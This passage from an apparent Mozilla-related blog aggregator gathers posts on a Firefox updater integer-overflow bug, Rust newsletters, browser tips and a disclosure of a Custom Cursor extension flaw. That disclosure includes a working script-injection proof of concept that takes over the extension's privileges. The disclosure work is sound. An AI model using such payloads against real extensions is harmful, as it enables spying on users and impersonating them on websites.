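Here’s a self-contained C sketch that walks a value through those first three steps (the variable names are mine, not the updater’s, and the unsigned-wrap cast stands in for the overflow, which is formally undefined behavior):

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

int main(void) {
  int32_t namelen = 0x7FFFFFFF;  /* highest positive 32-bit value */

  /* step 1: the + 1 wraps around to the most negative value */
  int32_t wrapped = (int32_t)((uint32_t)namelen + 1u);

  /* step 2: widening to 64 bits sign-extends */
  int64_t widened = wrapped;

  /* step 3: memcpy's size parameter is unsigned, so reinterpret the bits */
  uint64_t as_size = (uint64_t)widened;

  printf("%" PRId32 "\n", wrapped);                 /* -2147483648 */
  printf("0x%016" PRIX64 "\n", (uint64_t)widened);  /* 0xFFFFFFFF80000000 */
  printf("%" PRIu64 " bytes\n", as_size);           /* 18446744071562067968 */
  return 0;
}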

How the Fix Works

Now, with all that background, the fix makes perfect sense. Changing the parameter’s type means that the conversion to unsigned happens at the time mar_insert_item is called, and at that point the value being passed in is still a positive number, so converting it then is harmless (in fact it’s just nothing, that operation doesn’t do anything at all at that point). And then the + 1 is done to an unsigned number, so it’s harmless too, and there’s no sign extension to ever do because the thing being passed to memcpy is no longer signed. Everything gets a lot simpler to understand, and simultaneously more correct.
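
And here’s a sketch of the same arithmetic after the fix (again with my own made-up variable, just to show the shape of it): with namelen unsigned, the + 1 and the widening are both completely boring.

#include <stdint.h>
#include <stdio.h>

int main(void) {
  uint32_t namelen = 0x7FFFFFFF;   /* same input, now an unsigned parameter */
  size_t n = (size_t)namelen + 1;  /* widen first, then add: no wrap, no sign */
  printf("%zu bytes\n", n);        /* 2147483648: large, but no longer absurd */
  return 0;
}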

Takeaways

Don’t Use C

Implicit conversions are a misfeature. What they give you in convenience is more than erased by the potential for invisible bugs. More recently designed languages tend to be stricter about this sort of thing; Rust, for instance, just doesn’t have these kinds of implicit conversions at all. But C is from the 1970s and It Made Sense At The Time™. In C these things can’t really be avoided; they’re baked into the language. I’d very much recommend using another language for any new programs you work on, for this and a variety of other reasons10.

Layers of Security

This bug wasn’t exploitable in practice, partly because it’s just in an awkward place to exploit, but also because Firefox requires update files to be digitally signed by Mozilla or they won’t be read (beyond the minimum needed to check the signature), much less applied. That means that anybody wanting to attack Firefox users via this bug would also have to compromise Mozilla’s build infrastructure and use it to sign their own malicious MAR file. Having that additional layer of security makes most issues surrounding MAR files much, much less concerning.

You Can Do Systems Programming

Something I’ve hoped to get across (and I acknowledge this may not be the ideal topic to make this point, but it’s an important point to me) is that low-level (“systems”) programming isn’t magic or really special in any way. It’s true there’s a lot going on and there are lots of little details, but that’s true for any kind of programming, or anything else involving computers at all to be honest. Everything involved here was invented and built by people, and it can all be broken down and understood. And that’s the message I want to sign off with: you can do systems programming. It’s not too hard. It’s not too complicated. It’s not limited to just “experts”. You are smart and capable and you can do the thing.


1. A fair question to ask here would be why we even have our own package format. There’s a few reasons and you can read the original discussion from back when the format was first introduced if you’re interested, but the main benefit nowadays is that we’re able to locate and validate the package’s signature before really having to parse anything else. In fact, the bug that this post is about doesn’t get hit until after the MAR file has passed signature validation, so it could only be exploited using either a properly signed MAR or a custom build of Firefox/Thunderbird/whatever other application that disables MAR signing. ↩︎

2. I’m only going to talk about integers, because numbers that have a decimal or fraction part work very differently (and can be implemented a few different ways), and they aren’t relevant here. ↩︎

3. You almost never need numbers that can only be either negative or zero, so neither hardware nor languages generally support those, you’d just have to use a signed integer in that case. ↩︎

4. That is a real thing called signed magnitude and it is used for certain things, but not standard integers in modern computers. ↩︎

5. If you’re curious about the math that explains why this is the case, I’ll direct you to Wikipedia’s proof; I’ve spent enough time in the weeds for one blog post already. ↩︎

6. Theoretically int is meant to be whatever size the computer hardware you’re compiling your program for finds most convenient to work with (its “word size”), so it would be 32 bits on a 32-bit CPU and 64 bits on a 64-bit CPU. In practice though, for backwards compatibility reasons, int is usually 32 bits on all but pretty specialized hardware. It’s best never to depend on int being any particular size and to use the type that specifically represents a particular size if you need to be sure; for instance if you know you need exactly 32 bits, use int32_t, not int. ↩︎

7. If you don’t know C, you might be wondering what the + 1 is even for. It’s a little out of scope for this post, but in short, since as we mentioned earlier C strings don’t keep track of their length, if you don’t store that length off somewhere (and typically you don’t), you need some other way to find where the string ends. That’s done by adding one character made up of all zero bits to the end of the string, called a “null terminator”, so when you’re reading a string and you encounter a null character, then you know the string is over. Most C coding conventions have you leave the terminator out of the length, so whenever you’re doing something that needs to account for the terminator (like copying it, because then you have to copy the terminator also), you have to add 1 to the length so that you have space for it. C programming is full of fiddly details like this. ↩︎

8. This problem shows up so often and is such a common source of security bugs that it gets its own name, integer overflow. On Wikipedia you’ll find lots of famous examples and different ways to combat the issue. ↩︎

9. AKA about 16 exbibytes. I swear that is really what it’s called. ↩︎

10. Yes, I acknowledge there are certain circumstances where you really must write things in C, or maybe C++ if you’re lucky. If you have one of those situations, then you already know whatever I could tell you. If you don’t, then don’t use C. And don’t @ me. ↩︎

This Week In RustThis Week in Rust 410

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is miette, a library for error handling that is beautiful both in code and output.

Thanks to Kat Marchán for the self-suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

265 pull requests were merged in the last week

Rust Compiler Performance Triage

The largest story for the week is the massive improvement that comes from enabling the new pass manager in LLVM, which leads to consistent 5% to 30% improvements across almost all test cases. The regressions were mostly minor, with clear paths for addressing the ones that were not made with some specific trade-off in mind.

Triage done by @rylev. Revision range: 7743c9..83f147

4 Regressions, 4 Improvements, 3 Mixed; 0 of them in rollups

43 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Enso

Stockly

Timescale

ChainSafe

Kraken

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

This week we have two great quotes!

The signature of your function is your contract with not only the compiler, but also users of your function.

Quine Dot on rust-users

Do you want to know what was harder than learning lifetimes? Learning the same lessons through twenty years of making preventable mistakes.

Zac Burns in his RustConf talk

Thanks to Daniel H-M and Erik Zivkovic for the suggestions!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Wladimir PalantBreaking Custom Cursor to p0wn the web

Browser extensions make attractive attack targets. That’s not necessarily because of the data handled by the extension itself, but too often because of the privileges granted to the extension. Extensions with access to all websites in particular should be careful and reduce the attack surface as much as possible. Today’s case study is Custom Cursor, a Chrome extension that more than 6 million users granted essentially full access to their browsing session.

[Image: a red mouse cursor with evil eyes, grinning with its sharp teeth, next to the text “Custom Cursor”. Image credits: Custom Cursor, palomaironique]

The attack surface of Custom Cursor is unnecessarily large: it grants the custom-cursor.com website excessive privileges while also disabling default Content Security Policy protection. The result: anybody controlling custom-cursor.com (e.g. via one of the very common cross-site scripting vulnerabilities) could take over the extension completely. As of Custom Cursor 3.0.1 this particular vulnerability has been resolved; the attack surface remains excessive however. I recommend uninstalling the extension; it isn’t worth the risk.

Integration with extension’s website

The Custom Cursor extension will let you view cursor collections on the custom-cursor.com website; installing them in the extension works with one click. The seamless integration is possible thanks to the following lines in the extension’s manifest.json file:

"externally_connectable": {
  "matches": [ "*://*.custom-cursor.com/*" ]
},

This means that any webpage under the custom-cursor.com domain is allowed to call chrome.runtime.sendMessage() to send a message to this extension. The message handling in the extension looks as follows:

browser.runtime.onMessageExternal.addListener(function (request, sender, sendResponse) {
  switch (request.action) {
    case "getInstalled": {
      ...
    }
    case "install_collection": {
      ...
    }
    case "get_config": {
      ...
    }
    case "set_config": {
      ...
    }
    case "set_config_sync": {
      ...
    }
    case "get_config_sync": {
      ...
    }
  }
}.bind(this));

This doesn’t merely allow the website to retrieve information about the installed icon collections and install new ones, it also provides the website with arbitrary access to extension’s configuration. This in itself already has some abuse potential, e.g. it allows tracking users more reliably than with cookies as extension configuration will survive clearing browsing data.

The vulnerability

Originally I looked at Custom Cursor 2.1.10. This extension version used jQuery for its user interface. As noted before, jQuery encourages sloppy security practices, and Custom Cursor wasn’t an exception. For example, it would create HTML elements by giving jQuery HTML code:

collection = $(
  `<div class="box-setting" data-collname="${collname}">
    <h3>${item.name}</h3>
    <div class="collection-cursors" data-collname="${collname}">
    </div>
  </div>`
);

With collname being the unsanitized collection name here, this code allows HTML injection. A vulnerability like that is normally less severe for browser extensions, thanks to their default Content Security Policy. Except that Custom Cursor doesn’t use the default policy but instead:

"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",

This 'unsafe-eval' allows calling inherently dangerous JavaScript functions like eval(). And what calls eval() implicitly? Why, jQuery of course, when processing a <script> tag in the HTML code. A malicious collection name like Test<script>alert(1)</script> will display the expected alert message when the list of collections is displayed by the extension.

So by installing a collection with a malicious name, the custom-cursor.com website could run JavaScript code in the extension. But does that code also have access to all of the extension’s privileges? Yes, as the following code snippet proves:

chrome.runtime.sendMessage("ogdlpmhglpejoiomcodnpjnfgcpmgale", {
  action: "install_collection",
  slug: "test",
  collection: {
    id: 1,
    items: [],
    slug: "test",
    name: `Test
      <script>
        chrome.runtime.getBackgroundPage(page => page.console.log(1));
      </script>`
  }
})

When executed on any webpage under the custom-cursor.com domain this will install an empty icon collection. The JavaScript code in the collection name will retrieve the extension’s background page and output some text to its console. It could have instead called page.eval() to run additional code in the context of the background page, where it would persist for the entire browsing session. And it would have access to all of the extension’s privileges:

"permissions": [ "tabs", "*://*/*", "storage" ],

This extension has full access to all websites. So malicious code could spy on everything the user does, and it could even load more websites in the background in order to impersonate the user towards the websites. If the user is logged into Amazon for example, it could place an order and have it delivered to a new address. Or it could send spam via the user’s Gmail account.

What’s fixed and what isn’t

When I reported this vulnerability I gave five recommendations to reduce the attack surface. Out of these, one has been implemented: jQuery has been replaced by React, a framework not inherently prone to cross-site scripting vulnerabilities. So the immediate code execution vulnerability has been resolved.

Otherwise nothing changed however and the attack surface remains considerable. The following recommendations have not been implemented:

  1. Use the default Content Security Policy or at least remove 'unsafe-eval'.
  2. Restrict special privileges for custom-cursor.com to HTTPS and specific subdomains only. As custom-cursor.com isn’t even protected by HSTS, any person-in-the-middle attacker could force the website to load via unencrypted HTTP and inject malicious code into it.
  3. Protect the custom-cursor.com website via a Content Security Policy, which would make exploitable cross-site scripting vulnerabilities far less likely (rough examples of this and the HSTS header are sketched after this list).
  4. Restrict the privileges granted to the website, in particular removing arbitrary access to configuration options.
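
For illustration only, here is roughly what those two server-side protections would look like as HTTP response headers (hypothetical example values, not anything custom-cursor.com actually serves):

Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src 'self'; script-src 'self'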

The first two changes in particular would have been trivial to implement, especially when compared to the effort of moving from jQuery to React. Why this has not been done is beyond me.

Timeline

  • 2021-06-30: Sent a vulnerability report to various email addresses associated with the extension
  • 2021-07-05: Requested confirmation that the report has been received
  • 2021-07-07: Received confirmation that the issue is being worked on
  • 2021-09-28: Published article (90 days deadline)

The Talospace ProjectDAWR YOLO even with DD2.3

Way back in Linux 5.2, a "YOLO" mode was added for the DAWR register required for debugging with hardware watchpoints. This register functions properly on POWER8 but has an erratum on pre-DD2.3 POWER9 steppings (what Raptor sells as "v1") where the CPU will checkstop — invariably bringing the operating system to a screeching halt — if a watchpoint is set on cache-inhibited memory like device I/O. This is rare but catastrophic enough that the option to enable DAWR anyway is hidden behind a debugfs switch.

Now that I'm stressing out gdb a lot more working on the Firefox JIT, it turns out that even if you do upgrade your CPUs to DD2.3 (as I did for my dual-8 Talos II system, or what Raptor sells as "v2"), you don't automatically get access to the DAWR even on a fixed POWER9 (Fedora 34). Although you'll no longer be YOLOing it on such a system, still remember to echo Y > /sys/kernel/debug/powerpc/dawr_enable_dangerous as root and restart your debugger to pick up hardware watchpoint support.

Incidentally, I'm about two-thirds of the way through the wasm test cases. The MVP is little-endian POWER9 Baseline Interpreter and Wasm support, so we're getting closer and closer. You can help.

Karl DubostWhen iOS will allow other browsers

User agent sniffing is doomed to fail. It has this thick layer of opacity and logic, where you are never sure what you will really get in the end.

[Image: a stuffed animal seen through the opaque glass of a window]

This happens all the time and will happen again. It's often not only technical, but business related and just human. But let's focus on the detection of Firefox on iOS. Currently, on iOS, every browser uses the same rendering engine, the one mandated by Apple. Be it Chrome, Firefox, etc., they all use WKWebView.

One of the patterns of user agent detections goes like this:

  1. Which browsers? Firefox, Chrome, Safari, etc.
  2. Which device type? Mobile, Desktop, Tablet
  3. Which browser version?

You have 30 seconds to guess what is missing in this scenario.

Yes, the OS. Is it iOS or Android? The current logic for some developers is that

  • Safari + mobile = iOS
  • Firefox + mobile = Android

As of today, Firefox

  • on iOS is version 37
  • on Android is version 94
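
For reference, the two User-Agent strings look roughly like this (approximate examples, not exact build strings); note how the iOS one carries an FxiOS token and a Safari/WebKit signature, while the Android one carries Gecko and Firefox tokens:

Mozilla/5.0 (iPhone; CPU iPhone OS 14_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/37.0 Mobile/15E148 Safari/605.1.15
Mozilla/5.0 (Android 11; Mobile; rv:94.0) Gecko/94.0 Firefox/94.0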

So if the site has a minimum version support grid like this one:

function l() {
  var t = window.navigator.userAgent,
    e = {
      action: "none",
    },
    n = c.warn,
    o = c.block;
  Object.keys(s).forEach(function (n) {
    t.match(n) && (e = c[s[n]]);
  });
  var r = a.detect(t);
  return (r.msie && r.version <= 11) ||
    (r.safari && r.version <= 8) ||
    (r.firefox && r.version <= 49)
    ? o
    : (r.chrome && r.version <= 21) ||
      (r.firefox && r.version <= 26 && !r.mobile && !r.tablet) ||
      (r.safari && r.version <= 4 && r.mobile) ||
      (r.safari && r.version <= 6) ||
      (r.android && r.version <= 4)
    ? n
    : e;
}

Here the site sees Firefox… so it must be Android, so it must be Gecko. They have set their minimum support at version 49, so Firefox is considered outdated. The minimum Safari version on their grid is 8, so Firefox on iOS (WKWebView) would have no issues!

Fast Forward To The Future.

When Apple authorizes different rendering engines on iOS (yes, I'm on the optimistic side, because I'm patient), I already foresee a huge webcompat issue. The web developers (who are currently right) will infer in some ways that Firefox on iOS can only be WKWebView. So the day Gecko is authorized on iOS, we can expect more breakage and, ironically, some of the webcompat bugs we currently have will go away.

The Rust Programming Language BlogCore team membership updates

The Rust Core team is excited to announce the first of a series of changes to its structure we’ve been planning for 2021, starting today by adding several new members.

Originally, the Core team was composed of the leads from each Rust team. However, as Rust has grown, this has long stopped being true; most members of the Core team are not team leads in the project. In part, this is because Core’s duties have evolved significantly away from the original technical focus. Today, we see the Core team’s purpose as enabling, amplifying, and supporting the excellent work of every Rust team. Notably, this included setting up and launching the Rust Foundation.

We know that our maintainers, and especially team leads, dedicate an enormous amount of time to their work on Rust. We care deeply that it’s possible for not just people working full time on Rust to be leaders, but that part time volunteers can as well. To enable this, we wish to avoid coupling leading a team with a commitment to stewarding the project as a whole as part of the Core team. Likewise, it is important that members of the Core team have the option to dedicate their time to just the Core team’s activities and serve the project in that capacity only.

Early in the Rust project, the Core team was made up almost entirely of Mozilla employees working full time on Rust. Because this team was made up of team leads, it follows that team leads were also overwhelmingly composed of Mozilla employees. As Rust has grown, folks previously employed at Mozilla left for new jobs and new folks appeared. Many of the new folks were not employed to work on Rust full time, so the collective time investment decreased and the shape of the Core team’s work schedule shifted from 9-5 to a more volunteer cadence. Currently, the Core team is composed largely of volunteers, and no member of the Core team is employed full time to work on their Core team duties.

We know that it’s critical to driving this work successfully to have stakeholders on the team who are actively working in all areas of the project to help prioritize the Core team’s initiatives. To serve this goal, we are announcing some changes to the Core team’s membership today: Ryan Levick, Jan-Erik Rediger, and JT are joining the Core team. To give some context on their backgrounds and experiences, each new member has written up a brief introduction.

  • Ryan Levick began exploring Rust in 2014 always looking for more and more ways to be involved in the community. Over time he participated more by co-organizing the Berlin Rust meetup, doing YouTube tutorials, helping with various project efforts, and more. In 2019, Ryan got the opportunity to work with Rust full time leading developer advocacy for Rust at Microsoft and helping build up the case for Rust as an official language inside of Microsoft. Nowadays he’s an active Rust project member with some of the highlights including working in the compiler perf team, running the Rust annual survey, and helping the 2021 edition effort.
  • Jan-Erik Rediger started working with Rust sometime in late 2014 and has been a member of the Rust Community Team since 2016. That same year he co-founded RustFest, one of the first conferences dedicated to Rust. In the following years seven RustFest conferences have brought together hundreds of Rust community members all around Europe and more recently online.
  • JT has 15 years of programming language experience. During that time, JT worked at Cray on the Chapel programming language and at Apple on LLVM/Clang. In 2012, they joined Microsoft as part of the TypeScript core team, where they helped to finish and release TypeScript to the world. They stayed on for over three years, helping direct TypeScript and grow its community. From there, they joined Mozilla to work on Rust, where they brought their experience with TypeScript to help the Rust project transition from a research language to an industrial language. During this time, they co-created the new Rust compiler error message format and the Rust Language Server. Their most recent work is with Nushell, a programming language implemented in Rust.

These new additions will add fresh perspectives along several axes, including geographic and employment diversity. However, we recognize there are aspects of diversity we can continue to improve. We see this work as critical to the ongoing health of the Rust project, and it is part of the work that will be coordinated between the Rust Core team and the Rust Foundation.

Manish Goregaokar is also leaving the team to be able to focus better on the dev-tools team. Combining team leadership with Core team duties is a heavy burden. While Manish has enjoyed his time working on project-wide initiatives, this coupling isn’t quite fair to the needs of the devtools team, and he’s glad to be able to spend more time on the devtools team moving forward.

The Core team has been doing a lot of work in figuring out how to improve how we work and how we interface with the rest of the project. We’re excited to be able to share more on this in future updates.

We're super excited for Manish’s renewed efforts on the dev tools team and for JT, Ryan, and Jan-Erik to get started on core team work! Congrats and good luck!

This post is part 1 of a multi-part series on updates to the Rust core team.

Cameron KaiserQuestionable RCE with .webloc/.inetloc files

A report surfaced recently that at least some recent versions of macOS can be exploited to run arbitrary local applications using .inetloc files, which may allow a drive-by download to automatically kick off a vulnerable application and exploit it. Apple appeared to acknowledge the fault, but did not assign it a CVE; the reporter seems not to have found the putative fix satisfactory and public disclosure thus occurred two days ago.

The report claims the proof of concept works on all prior versions of macOS, but it doesn't seem to work (even with corrected path) on Tiger. Unfortunately due to packing I don't have a Leopard or Snow Leopard system running right now, so I can't test those, but the 10.4 Finder (which would launch these files) correctly complains they are malformed. As a safety measure in case there is something exploitable, the October SPR build of TenFourFox will treat both .webloc and .inetloc files that you might download as executable. (These files use similar pathways, so if one is exploitable after all, then the other probably is too.) I can't think of anyone who would depend on the prior behaviour, but in our unique userbase I'm sure someone does, so I'm publicizing this now ahead of the October 5 release. Meanwhile, if someone's able to make the exploit work on a Power Mac, I'd be interested to hear how you did it.

This Week In RustThis Week in Rust 409

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
RustConf 2021
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is flowistry, a VS code extension to visualize data flow in Rust code.

Thanks to Willi Kappler for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

256 pull requests were merged in the last week

Rust Compiler Performance Triage

A nice week: more improvements than regressions.

Triage done by @pnkfelix. Revision range: 9f85cd6f2..7743c9f

2 Regressions, 4 Improvements, 8 Mixed; ??? of them in rollups

44 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

Upcoming Events

Online
North America
Europe

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Kollider

Subspace Labs

Oxford Ionics

ChainSafe

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

the strains of the project have hurt a lot of people over the years and I think maybe the only path to recovery involves getting some distance from it.

Graydon Hoare on twitter

Thanks to mmmmib for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

The Mozilla BlogLocation history: How your location is tracked and how you can limit sharing it

In real estate, the age-old mantra is “location, location, location,” meaning that location drives value. That’s true when it comes to data collection in the online world, too: your location history is valuable, authentic information. In all likelihood, you’re leaving a breadcrumb trail of location data every day, but there are a few things you can do to clean that up and keep more of your goings-on to yourself.

What is location history?

When your location is tracked and stored over time, it becomes a body of data called your location history. This is rich personal data that shows when you have been at specific locations, and can include things like frequency and duration of visits and stops along the way. Connecting all of that location history, companies can create a detailed picture and make inferences about who you are, where you live and work, your interests, habits, activities, and even some very private things you might not want to share at all.

How is location data used?

For some apps, location helps them function better, like navigating with a GPS or following a map. Location history can also be useful for retracing your steps to past places, like finding your way back to that tiny shop in Florence where you picked up beautiful stationery two years ago.

On the other hand, marketing companies use location data for marketing and advertising purposes. They can also use location to conduct “geomarketing,” which is targeting you with promotions based on where you are. Near a certain restaurant while you’re out doing errands at midday? You might see an ad for it on your phone just as you’re thinking about lunch.

Location can also be used to grant or deny access to certain content. In some parts of the world, content on the internet is “geo-blocked” or geographically restricted based on your IP address, which is kind of like a mailing address associated with your online activity. Geo-blocking can happen due to things like copyright restrictions, limited licensing rights or even government control.

Who can view your location data?

Any app that you grant permission to see your location has access to it. Unless you carefully read each data policy or privacy policy, you won’t know how your location data — or any personal data — collected by your apps is used. 

Websites can also detect your general location through your IP address or by asking directly what your location is, and some sites will take it a step further by requesting more specifics like your zip code to show you different site content or search results based on your locale.

How to disable location request prompts

Tired of websites asking for your location? Here’s how to disable those requests:

Firefox: Type “about:preferences#privacy” in the URL bar. Go to Permissions > Location > Settings. Select “Block new requests asking to access your location”. Get more details about location sharing in Firefox.

Safari: Go to Settings > Websites > Location. Select “When visiting other websites: Deny.”

Chrome: Go to Settings > Privacy and security > Site Settings. Then click on Location and select “Don’t allow sites to see your location”

Edge: Go to Settings and more > Settings > Site permissions > Location. Select “Ask before accessing”

Limit, protect and delete your location data

Most devices have the option to turn location tracking off for the entire device or for select apps. Here’s how to view and change your location privacy settings:

How to delete your Google Location History
Ready to delete your Google Location History in one fell swoop? There’s a button for that.

It’s also a good idea to review all of the apps on your devices. Check to see if you’re sharing your location with some that don’t need it at all, or don’t need it all the time. Some of them might be set up just to get your location, giving you little benefit in return while sharing it with a network of third parties. Consider deleting apps that you don’t use or whose service you could just as easily get through a mobile browser, where you might have better location protection.

Blur your device’s location for next-level privacy

Learn more about Mozilla VPN

The post Location history: How your location is tracked and how you can limit sharing it appeared first on The Mozilla Blog.

Firefox NightlyThese Weeks in Firefox: Issue 100

Highlights

    • Firefox 92 was released today!
    • We’re 96% through M1 for Fluent migration! Great work from kpatenio and niklas!
      • [Screenshot]
        • Caption: A graph showing how Fluent strings have overtaken DTD strings over time as the dominant string mechanism in browser.xhtml. As of September 2nd, it shows that there are 732 Fluent strings and 32 DTD strings in browser.xhtml
      • Fluent is our new localization framework
    • We have improvements coming soon for our downloads panel! You can opt in by enabling browser.download.improvements_to_download_panel in about:config.
  • Nightly now has an about:unloads page to show some of the locally collected heuristics being used to decide which tabs to unload on memory pressure. You can also manually unload tabs from here.
    • As part of Fission-related changes, we’ve rearchitected some of the internals of the WebExtensions framework – see Bug 1708243
  • If you notice recent addons-related regressions in Nightly 94 and Beta 93 (e.g. like Bug 1729395, affecting the multi-account-containers addon), please file a bug and needinfo us (rpl or zombie).

Friends of the Firefox team

For contributions from August 25th to September 7th 2021, inclusive.

Resolved bugs (excluding employees)

Fixed more than one bug

  • Ava Katushka
  • Itiel
  • Michael Kohler [:mkohler]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • :gregtatum landed in Firefox 93 a follow up to Bug 1722087 to migrate users away from the old recommended themes that have been removed from the omni.jar – Bug 1723602.
WebExtension APIs
  • extension.getViews now also returns existing sidebar extension pages when called with a `windowId` filter – Bug 1612390 (closed by one of the changes landed as part of Bug 1708243)

Downloads Panel

Fluent

Form Autofill

  • Bug 1687684 – Fix credit card autofill when the site prefills fields
  • Bug 1688209 – Prevent simple hidden fields from being eligible for autofill.

High-Contrast Mode (MSU Capstone project)

  • Molly and Micah have kicked off another semester working with MSU capstone students. They’ll be helping us make a number of improvements to high-contrast mode on Firefox Desktop. See this meta bug to follow along.
  • We’ll be doing a hack weekend on September 11 & 12 where students will get ramped up on their first bugs and tools needed to do Firefox development.

Lint, Docs and Workflow

Password Manager

  • Welcome Serg Galich, who will be working on credential management with Tim and Dimi.

Search and Navigation

  • Drew landed some early UI changes, part of Firefox Suggest, in Nightly. In particular, labels have been added to Address Bar groups. A goal of Firefox Suggest is to provide smarter and more useful results, and better grouping, while also improving our understanding of how the address bar results are perceived. More experiments are ongoing and planned for the near future.
  • Daisuke landed a performance improvement to the address bar tokenizer. Bug 1726837

Mike TaylorTesting Chrome version 100 for fun and profit (but mostly fun I guess)

Great news readers, my self-imposed 6 month cooldown on writing amazing blog posts has expired.

My pal Ali just added a flag to Chromium to allow you to test sites while sending a User-Agent string that claims to be version 100 (should be in version 96+, that’s in the latest Canary if you download or update today):

[Screenshot of chrome://flags/#force-major-version-to-100]

I’ll be lazy and let Karl Dubost do the explaining of the why, in his post “Get Ready For Three Digits User Agent Strings”.

So turn it on and report all kinds of bugs, either at crbug.com/new or webcompat.com/issues/new.

Firefox Add-on ReviewsYouTube your way—browser extensions put you in charge of your video experience

YouTube wants you to experience YouTube in very prescribed ways. But with the right browser extension, you’re free to alter YouTube to taste. Change the way the site looks, behaves, and delivers your favorite videos. 

Enhancer for YouTube

With dozens of customization features, Enhancer for YouTube has the power to dramatically reorient the way you watch videos. 

While a bunch of customization options may seem overwhelming, Enhancer for YouTube actually makes it very simple to navigate its settings and select just your favorite features. You can even choose which of your preferred features will display in the extension’s easy access interface that appears just beneath the video player.

Caption: Enhancer for YouTube offers easy access controls just beneath the video player.

Key features… 

  • Customize video player size 
  • Change YouTube’s look with a dark theme
  • Volume booster
  • Ad blocking (with ability to whitelist channels you OK for ads)
  • Take quick screenshots of videos
  • Change playback speed
  • Set default video quality from low to high def
  • Shortcut configuration

YouTube High Definition

Though its primary function is to automatically play all YouTube videos in their highest possible resolution, YouTube High Definition has a few other fine features to offer. 

In addition to automatic HD, YouTube High Definition can…

  • Customize video player size
  • HD support for clips embedded on external sites
  • Specify your ideal resolution (4k – 144p)
  • Set a preferred volume level 
  • Also automatically plays the highest quality audio

YouTube NonStop

So simple. So awesome. YouTube NonStop remedies the headache of interrupting your music with that awful “Video paused. Continue watching?” message. 

Works on YouTube and YouTube Music. You’re now free to navigate away from your YouTube tab for as long as you like and not fret that the rock will stop rolling. 

YouTube Audio

Another simple but great extension for music fans, YouTube Audio disables the video broadcast and just streams audio to save you a ton of bandwidth. 

This is an essential extension if you have limited internet bandwidth and only want the music anyway. Click YouTube Audio’s toolbar button to mute the video stream anytime you like. Also helps preserve battery life. 

PocketTube

If you subscribe to a lot of YouTube channels PocketTube is a fantastic way to organize all your subscriptions by themed collections. 

Group your channel collections by subject, like “Sports,” “Cooking,” “Cat videos” or whatever. Other key features include…

  • Add custom icons to easily identify your channel collections
  • Customize your feed so you just see videos you haven’t watched yet, prioritize videos from certain channels, plus other content settings
  • Integrates seamlessly with YouTube homepage 
  • Sync collections across Firefox/Android/iOS using Google Drive and Chrome Profiler
Caption: PocketTube keeps your channel collections neatly tucked away to the side.

AdBlocker for YouTube

It’s not just you who’s noticed a lot more ads lately. Regain control with AdBlocker for YouTube.

The extension very simply and effectively removes both video and display ads from YouTube. Period. Enjoy a faster, more focused YouTube. 

SponsorBlock

It’s a terrible experience when you’re enjoying a video or music on YouTube and you’re suddenly interrupted by a blaring ad. SponsorBlock solves this problem in a highly effective and original way. 

Leveraging the power of crowdsourced information to locate precisely where interruptive sponsored segments appear in videos, SponsorBlock learns to automatically skip sponsored segments using its ever-growing database of videos. You can also participate in the project by reporting sponsored segments whenever you encounter them (it’s easy to report right there on the video page with the extension).

SponsorBlock can also learn to skip the non-music portions of music videos and intros/outros as well. If you’d like a deeper dive into SponsorBlock, we profiled its developer and open source project on Mozilla Distilled.

We hope one of these extensions enhances the way you enjoy YouTube. Feel free to explore more great media extensions on addons.mozilla.org.


The Mozilla BlogDid you hear about Apple’s security vulnerability? Here’s how to find and remove spyware.

